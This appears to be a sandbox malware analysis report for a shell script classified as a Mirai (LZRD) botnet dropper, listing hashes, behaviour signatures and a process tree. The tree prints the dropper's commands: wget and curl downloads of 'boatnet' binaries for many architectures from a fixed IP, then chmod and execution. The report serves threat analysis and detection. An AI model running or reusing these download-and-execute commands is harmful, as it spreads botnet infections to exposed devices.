Overview

overview

10

Static

static

1

ohshit.sh

ubuntu-18.04-amd64

10

ohshit.sh

debian-9-armhf

10

ohshit.sh

debian-9-mips

10

ohshit.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    138s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    26-12-2024 12:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    6aff3f3662291b471ab7ad4cbdd57c29

  • SHA1

    04c570fcebd808ce12793fc191ee5cd886bbcc73

  • SHA256

    51a77320da977deac7fb703c6333820bae779ad712f3216fe4d407500d889a8d

  • SHA512

    d08ebda17bc94d8c89fcbb16f42c4be409ec96222e0c49b5a69b044b2e725a63caf03d803a225b76c764d86bba42a5b303bff539a90092e432aa861a7d6f4cc4

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Writes file to system bin folder 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads runtime system information 51 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:720
    • /usr/bin/wget
      wget http://85.237.211.124/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:725
    • /usr/bin/curl
      curl -O http://85.237.211.124/hiddenbin/boatnet.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:744
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:749
      • /bin/chmod
        chmod +x boatnet.x86 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
        2⤵
        • File and Directory Permissions Modification
        PID:750
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        PID:751
      • /usr/bin/wget
        wget http://85.237.211.124/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:753
      • /usr/bin/curl
        curl -O http://85.237.211.124/hiddenbin/boatnet.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:754
      • /bin/cat
        cat boatnet.mips
        2⤵
        • System Network Configuration Discovery
        PID:755
      • /bin/chmod
        chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
        2⤵
        • File and Directory Permissions Modification
        PID:756
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Reads runtime system information
        PID:757
      • /usr/bin/wget
        wget http://85.237.211.124/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:761
      • /usr/bin/curl
        curl -O http://85.237.211.124/hiddenbin/boatnet.arc
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:762
      • /bin/cat
        cat boatnet.arc
        2⤵
          PID:777
        • /bin/chmod
          chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
          2⤵
          • File and Directory Permissions Modification
          PID:779
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:781
        • /usr/bin/wget
          wget http://85.237.211.124/hiddenbin/boatnet.i468
          2⤵
            PID:783
          • /usr/bin/curl
            curl -O http://85.237.211.124/hiddenbin/boatnet.i468
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:792
          • /bin/cat
            cat boatnet.i468
            2⤵
              PID:801
            • /bin/chmod
              chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
              2⤵
              • File and Directory Permissions Modification
              PID:802
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:804
            • /usr/bin/wget
              wget http://85.237.211.124/hiddenbin/boatnet.i686
              2⤵
                PID:807
              • /usr/bin/curl
                curl -O http://85.237.211.124/hiddenbin/boatnet.i686
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:817
              • /bin/cat
                cat boatnet.i686
                2⤵
                  PID:819
                • /bin/chmod
                  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                  2⤵
                  • File and Directory Permissions Modification
                  PID:820
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:821
                • /usr/bin/wget
                  wget http://85.237.211.124/hiddenbin/boatnet.x86_64
                  2⤵
                    PID:822
                  • /usr/bin/curl
                    curl -O http://85.237.211.124/hiddenbin/boatnet.x86_64
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:823
                  • /bin/cat
                    cat boatnet.x86_64
                    2⤵
                      PID:824
                    • /bin/chmod
                      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:825
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:826
                    • /usr/bin/wget
                      wget http://85.237.211.124/hiddenbin/boatnet.mpsl
                      2⤵
                      • Writes file to tmp directory
                      PID:827
                    • /usr/bin/curl
                      curl -O http://85.237.211.124/hiddenbin/boatnet.mpsl
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:828
                    • /bin/cat
                      cat boatnet.mpsl
                      2⤵
                        PID:841
                      • /bin/chmod
                        chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                        2⤵
                        • File and Directory Permissions Modification
                        PID:842
                      • /tmp/WTF
                        ./WTF
                        2⤵
                        • Executes dropped EXE
                        PID:843
                      • /usr/bin/wget
                        wget http://85.237.211.124/hiddenbin/boatnet.arm
                        2⤵
                        • Writes file to tmp directory
                        PID:846
                      • /usr/bin/curl
                        curl -O http://85.237.211.124/hiddenbin/boatnet.arm
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:856
                      • /bin/cat
                        cat boatnet.arm
                        2⤵
                          PID:865
                        • /bin/chmod
                          chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                          2⤵
                          • File and Directory Permissions Modification
                          PID:866
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:867
                        • /usr/bin/wget
                          wget http://85.237.211.124/hiddenbin/boatnet.arm5
                          2⤵
                          • Writes file to tmp directory
                          PID:869
                        • /usr/bin/curl
                          curl -O http://85.237.211.124/hiddenbin/boatnet.arm5
                          2⤵
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:870
                        • /bin/cat
                          cat boatnet.arm5
                          2⤵
                            PID:871
                          • /bin/chmod
                            chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                            2⤵
                            • File and Directory Permissions Modification
                            PID:872
                          • /tmp/WTF
                            ./WTF
                            2⤵
                            • Executes dropped EXE
                            PID:873
                          • /usr/bin/wget
                            wget http://85.237.211.124/hiddenbin/boatnet.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:875
                          • /usr/bin/curl
                            curl -O http://85.237.211.124/hiddenbin/boatnet.arm6
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:876
                          • /bin/cat
                            cat boatnet.arm6
                            2⤵
                              PID:877
                            • /bin/chmod
                              chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                              2⤵
                              • File and Directory Permissions Modification
                              PID:878
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:879
                            • /usr/bin/wget
                              wget http://85.237.211.124/hiddenbin/boatnet.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:881
                            • /usr/bin/curl
                              curl -O http://85.237.211.124/hiddenbin/boatnet.arm7
                              2⤵
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:882
                            • /bin/cat
                              cat boatnet.arm7
                              2⤵
                                PID:883
                              • /bin/chmod
                                chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                                2⤵
                                • File and Directory Permissions Modification
                                PID:884
                              • /tmp/WTF
                                ./WTF
                                2⤵
                                • Executes dropped EXE
                                PID:885
                              • /usr/bin/wget
                                wget http://85.237.211.124/hiddenbin/boatnet.ppc
                                2⤵
                                • Writes file to tmp directory
                                PID:887
                              • /usr/bin/curl
                                curl -O http://85.237.211.124/hiddenbin/boatnet.ppc
                                2⤵
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:888
                              • /bin/cat
                                cat boatnet.ppc
                                2⤵
                                  PID:889
                                • /bin/chmod
                                  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-5a8f9893b55c49a5b140033e51eec39b-systemd-timedated.service-UgYiTq WTF
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:890
                                • /tmp/WTF
                                  ./WTF
                                  2⤵
                                  • Executes dropped EXE
                                  PID:891
                                • /usr/bin/wget
                                  wget http://85.237.211.124/hiddenbin/boatnet.spc
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:893
                                • /usr/bin/curl
                                  curl -O http://85.237.211.124/hiddenbin/boatnet.spc
                                  2⤵
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:897
                                • /bin/cat
                                  cat boatnet.spc
                                  2⤵
                                    PID:898
                                  • /bin/chmod
                                    chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:899
                                  • /tmp/WTF
                                    ./WTF
                                    2⤵
                                    • Executes dropped EXE
                                    PID:900
                                  • /usr/bin/wget
                                    wget http://85.237.211.124/hiddenbin/boatnet.m68k
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:902
                                  • /usr/bin/curl
                                    curl -O http://85.237.211.124/hiddenbin/boatnet.m68k
                                    2⤵
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:903
                                  • /bin/cat
                                    cat boatnet.m68k
                                    2⤵
                                      PID:904
                                    • /bin/chmod
                                      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:905
                                    • /tmp/WTF
                                      ./WTF
                                      2⤵
                                      • Executes dropped EXE
                                      PID:906
                                    • /usr/bin/wget
                                      wget http://85.237.211.124/hiddenbin/boatnet.sh4
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:908
                                    • /usr/bin/curl
                                      curl -O http://85.237.211.124/hiddenbin/boatnet.sh4
                                      2⤵
                                      • Reads runtime system information
                                      • Writes file to tmp directory
                                      PID:909
                                    • /bin/cat
                                      cat boatnet.sh4
                                      2⤵
                                        PID:910
                                      • /bin/chmod
                                        chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:911
                                      • /tmp/WTF
                                        ./WTF
                                        2⤵
                                        • Executes dropped EXE
                                        PID:912

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • /tmp/WTF
                                      Filesize

                                      30KB

                                      MD5

                                      57d9dd04cc69d14542597b2bcfa56fc1

                                      SHA1

                                      bd8fd9f4ea3bed7bd78c369a660c52d1cf275e59

                                      SHA256

                                      4c0ab9d6fe4cb26e5de43d07f6092e7848c1a53b9dc2561bbc133a3027e57736

                                      SHA512

                                      46bed754083dbaf6e348e9b8a70741bdcefd2d40fba12679edbbd30f552646bee26a499afe13c138e7f6b16fec534986cb685b9da91841d0deca560e83c0d29c

                                      Download Submit

                                    • /tmp/WTF
                                      Filesize

                                      105KB

                                      MD5

                                      54cb697151adb7e30ab7d8b7364d9288

                                      SHA1

                                      6f39ef43d110fdf3b885c2766274a437daefb21c

                                      SHA256

                                      7d8a7bb269e8730836b1fba783bf3afe0cf76e2661920ee9295d7f29a5ad1158

                                      SHA512

                                      eb2e4337339a7696107d6c31a7f41759c06f0d9c07ffc9a8fba289377d30f0cd7ded8f2c74bc880aab3b4dfa79843a43f6b01a23d05c150d533da21171c7549d

                                      Download Submit

                                    • /tmp/WTF
                                      Filesize

                                      220B

                                      MD5

                                      f1c24d9fa40a047ae22d2d3ae7dfeac9

                                      SHA1

                                      750274b02d5f5b00026a4f55b020f4285c693533

                                      SHA256

                                      219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

                                      SHA512

                                      36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

                                      Download Submit

                                    • /tmp/WTF
                                      Filesize

                                      220B

                                      MD5

                                      a8f502a6fb3b7b940e922c951d9e493a

                                      SHA1

                                      fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

                                      SHA256

                                      748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

                                      SHA512

                                      e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

                                      Download Submit

                                    • /tmp/WTF
                                      Filesize

                                      71KB

                                      MD5

                                      0f741e3496febca7050f7fe6e6ac52ba

                                      SHA1

                                      414a047b99c5b716e11aad1efb4bdc8ae43c98e5

                                      SHA256

                                      1fe3e25acaefe7099dc913b9fb3e63fe020bc10bfeac407288977584712a3dec

                                      SHA512

                                      ae0670e090f0ad2acc18a2da14a0c3656ae7e41db0a104f9fb22493f7e8ba24450c9f3f97ef3048c042b8a07b4f144a802591092c2fceee0e120321ed4b3dcd1

                                      Download Submit

                                    • /tmp/boatnet.x86
                                      Filesize

                                      27KB

                                      MD5

                                      9e6da56f2e4b29e5d019938932a7d02d

                                      SHA1

                                      2039359cee130eb95673ba1d21a91965a87dc564

                                      SHA256

                                      b528a15b83072c5d848eba0700eedf37dbfb35938a29e41c4529bee4e325203a

                                      SHA512

                                      2084c8b7057d9fb9dc6587237c3e1a3172ae3cf51774097d587a2e2c6d0168b82d834b0c80d4f8672953df408e3b97dfc391f9aeb2ae263a2f12cbc12e34e382

                                      Download Submit